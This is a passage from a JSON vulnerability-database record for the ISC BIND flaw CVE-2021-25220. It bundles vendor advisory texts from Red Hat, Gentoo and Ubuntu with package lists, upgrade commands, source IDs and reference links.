64le.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.ppc64le.rpm\n\ns390x:\nbind-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.
s390x.rpm\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.ppc64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm\n\nppc64le:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.ppc64le.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm\n\ns390x:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.s
390x.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.s390x.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nbind-9.11.4-26.P2.el7_9.13.src.rpm\n\nnoarch:\nbind-license-9.11.4-26.P2.el7_9.13.noarch.rpm\n\nx86_64:\nbind-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 
7):\n\nx86_64:\nbind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm\nbind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm\nbind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2021-25220\nhttps://access.redhat.com/security/cve/CVE-2022-2795\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBY9AIs9zjgjWX9erEAQiz9BAAiQvmAQ5DWdOQbHHizPAHBnKnBtNBfCT3\niaAzKQ0Yrpk26N9cdrvcBJwdrHpI28VJ3eemFUxQFseUqtAErsgfL4QqnjPjQgsp\nU2qLPjqbzfOrbi1CuruMMIIbtxfwvsdic8OB9Zi7XzfZjWm2X4c6Ima+QXol6x9a\n8J2qdzCqhoYUXJgdpVK9nAAGsPtidcnqLYYIcTclJArp6uRSlEEk7EbNJvs2SAbj\nMUo5aq5BoVy2TkiMyqhT5voy6K8f4c7WbQYerNieps18541ZSr29fAzWBznr3Yns\ngE10Aaoa8uCxlaexFR8EahPVYe6wJAm6R62LBabEWChbzW0oxr7X2DdzX9eiOwl0\nwJT0n4GHoFsCGMa+v1yybkjHIUfiW25WC7bC4QDj4fjTpbicVlnttXhQJwCJK5bb\nPC27GE6qi7EqwHYJa/jPenbIG38mXj/r2bwIr1qYQMLjQ8BQIneShky3ZWE4l/jd\nzTMwGVal8ACBYdCALx/O9QNyzaO92xHLnKl3DIoqaQdjasIfGp/G6Xc1YggKyZAP\nVVtXPiOIbReBVNWiBXMH1ZEQeNon4su0/MbMWrmJpwvEzYeXkuWO98LZ4dlLVuim\nNG/dJ6RqzT6/aqRNVyOt5s4SLIQ5DrPXoPnZRUBsbpWhP6lxPhESKA0TUg5FYz33\neDGIrZR4jEY=azJw\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 9) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\nindividual devices on an IP network to get their own network configuration\ninformation, including an IP address, a subnet mask, and a broadcast\naddress. The dhcp packages provide a relay agent and ISC DHCP service\nrequired to enable and administer DHCP on a network. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202210-25\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Low\n Title: ISC BIND: Multiple Vulnerabilities\n Date: October 31, 2022\n Bugs: #820563, #835439, #872206\n ID: 202210-25\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been discovered in ISC BIND, the worst of\nwhich could result in denial of service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-dns/bind \u003c 9.16.33 \u003e= 9.16.33\n 2 net-dns/bind-tools \u003c 9.16.33 \u003e= 9.16.33\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in ISC BIND. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. 
\n\nResolution\n==========\n\nAll ISC BIND users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-dns/bind-9.16.33\"\n\nAll ISC BIND-tools users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-dns/bind-tools-9.16.33\"\n\nReferences\n==========\n\n[ 1 ] CVE-2021-25219\n https://nvd.nist.gov/vuln/detail/CVE-2021-25219\n[ 2 ] CVE-2021-25220\n https://nvd.nist.gov/vuln/detail/CVE-2021-25220\n[ 3 ] CVE-2022-0396\n https://nvd.nist.gov/vuln/detail/CVE-2022-0396\n[ 4 ] CVE-2022-2795\n https://nvd.nist.gov/vuln/detail/CVE-2022-2795\n[ 5 ] CVE-2022-2881\n https://nvd.nist.gov/vuln/detail/CVE-2022-2881\n[ 6 ] CVE-2022-2906\n https://nvd.nist.gov/vuln/detail/CVE-2022-2906\n[ 7 ] CVE-2022-3080\n https://nvd.nist.gov/vuln/detail/CVE-2022-3080\n[ 8 ] CVE-2022-38177\n https://nvd.nist.gov/vuln/detail/CVE-2022-38177\n[ 9 ] CVE-2022-38178\n https://nvd.nist.gov/vuln/detail/CVE-2022-38178\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202210-25\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. 
==========================================================================\nUbuntu Security Notice USN-5332-1\nMarch 17, 2022\n\nbind9 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 21.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Bind. \n\nSoftware Description:\n- bind9: Internet Domain Name Server\n\nDetails:\n\nXiang Li, Baojun Liu, Chaoyi Lu, and Changgen Zou discovered that Bind\nincorrectly handled certain bogus NS records when using forwarders. A\nremote attacker could possibly use this issue to manipulate cache results. \n(CVE-2021-25220)\n\nIt was discovered that Bind incorrectly handled certain crafted TCP\nstreams. A remote attacker could possibly use this issue to cause Bind to\nconsume resources, leading to a denial of service. This issue only affected\nUbuntu 21.10. (CVE-2022-0396)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 21.10:\n bind9 1:9.16.15-1ubuntu1.2\n\nUbuntu 20.04 LTS:\n bind9 1:9.16.1-0ubuntu2.10\n\nUbuntu 18.04 LTS:\n bind9 1:9.11.3+dfsg-1ubuntu1.17\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-25220"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "PACKETSTORM",
"id": "170724"
},
{
"db": "PACKETSTORM",
"id": "169894"
},
{
"db": "PACKETSTORM",
"id": "169846"
},
{
"db": "PACKETSTORM",
"id": "169745"
},
{
"db": "PACKETSTORM",
"id": "169773"
},
{
"db": "PACKETSTORM",
"id": "169587"
},
{
"db": "PACKETSTORM",
"id": "166354"
}
],
"trust": 2.34
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-25220",
"trust": 4.0
},
{
"db": "SIEMENS",
"id": "SSA-637483",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-22-258-05",
"trust": 1.5
},
{
"db": "JVN",
"id": "JVNVU99475301",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU98927070",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU92488108",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-25-105-08",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170724",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169894",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169846",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169773",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169587",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2022.1150",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5750",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.4616",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1223",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1289",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2694",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1183",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1160",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022032124",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031701",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022031728",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166356",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-25220",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169745",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166354",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "PACKETSTORM",
"id": "170724"
},
{
"db": "PACKETSTORM",
"id": "169894"
},
{
"db": "PACKETSTORM",
"id": "169846"
},
{
"db": "PACKETSTORM",
"id": "169745"
},
{
"db": "PACKETSTORM",
"id": "169773"
},
{
"db": "PACKETSTORM",
"id": "169587"
},
{
"db": "PACKETSTORM",
"id": "166354"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"id": "VAR-202203-0664",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.20766129
},
"last_update_date": "2026-04-10T22:16:12.611000Z",
"patch": {
"_id": null,
"data": [
{
"title": "NV22-009",
"trust": 0.8,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/API7U5E7SX7BAAVFNW366FFJGD6NZZKV/"
},
{
"title": "Ubuntu Security Notice: USN-5332-2: Bind vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5332-2"
},
{
"title": "Red Hat: Moderate: dhcp security and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228385 - Security Advisory"
},
{
"title": "Red Hat: Moderate: bind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227790 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: USN-5332-1: Bind vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5332-1"
},
{
"title": "Red Hat: Moderate: bind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228068 - Security Advisory"
},
{
"title": "Red Hat: Moderate: bind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230402 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-5105-1 bind9 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=16d84b908a424f50b3236db9219500e3"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-25220"
},
{
"title": "Amazon Linux 2: ALAS2-2023-2001",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2023-2001"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-166",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-166"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-138",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-138"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-25220 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-444",
"trust": 1.0
},
{
"problemtype": "HTTP Request Smuggling (CWE-444) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://kb.isc.org/v1/docs/cve-2021-25220"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202210-25"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20220408-0001/"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"
},
{
"trust": 1.6,
"url": "https://supportportal.juniper.net/s/article/2022-10-security-bulletin-junos-os-srx-series-cache-poisoning-vulnerability-in-bind-used-by-dns-proxy-cve-2021-25220?language=en_us"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25220"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25220"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2sxt7247qtknbq67mnrgzd23adxu6e5u/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5vx3i2u3icoiei5y7oya6cholfmnh3yq/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/api7u5e7sx7baavfnw366ffjgd6nzzkv/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/de3uavcpumakg27zl5yxsp2c3riow3jz/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nyd7us4hzrfugaj66zthfbyvp5n3oqby/"
},
{
"trust": 0.9,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-258-05"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu98927070/index.html"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu99475301/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu92488108/index.html"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-105-08"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/nyd7us4hzrfugaj66zthfbyvp5n3oqby/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/api7u5e7sx7baavfnw366ffjgd6nzzkv/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5vx3i2u3icoiei5y7oya6cholfmnh3yq/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2sxt7247qtknbq67mnrgzd23adxu6e5u/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/de3uavcpumakg27zl5yxsp2c3riow3jz/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169846/red-hat-security-advisory-2022-8385-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1223"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1289"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/isc-bind-spoofing-via-dns-forwarders-cache-poisoning-37754"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.4616"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169894/red-hat-security-advisory-2022-8068-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031728"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166356/ubuntu-security-notice-usn-5332-2.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1150"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1183"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1160"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169773/red-hat-security-advisory-2022-7643-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170724/red-hat-security-advisory-2023-0402-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169587/gentoo-linux-security-advisory-202210-25.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2021-25220/"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-258-05"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5750"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031701"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2694"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032124"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0396"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2795"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/9/html/9.1_release_notes/index"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-0396"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.7_release_notes/index"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/444.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2021-25220"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5332-2"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://alas.aws.amazon.com/al2/alas-2023-2001.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0402"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8385"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7790"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7643"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2906"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2881"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3080"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5332-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/bind9/1:9.16.1-0ubuntu2.10"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/bind9/1:9.16.15-1ubuntu1.2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/bind9/1:9.11.3+dfsg-1ubuntu1.17"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-25220"
},
{
"db": "PACKETSTORM",
"id": "170724"
},
{
"db": "PACKETSTORM",
"id": "169894"
},
{
"db": "PACKETSTORM",
"id": "169846"
},
{
"db": "PACKETSTORM",
"id": "169745"
},
{
"db": "PACKETSTORM",
"id": "169773"
},
{
"db": "PACKETSTORM",
"id": "169587"
},
{
"db": "PACKETSTORM",
"id": "166354"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-1514"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001797"
},
{
"db": "NVD",
"id": "CVE-2021-25220"
}
]
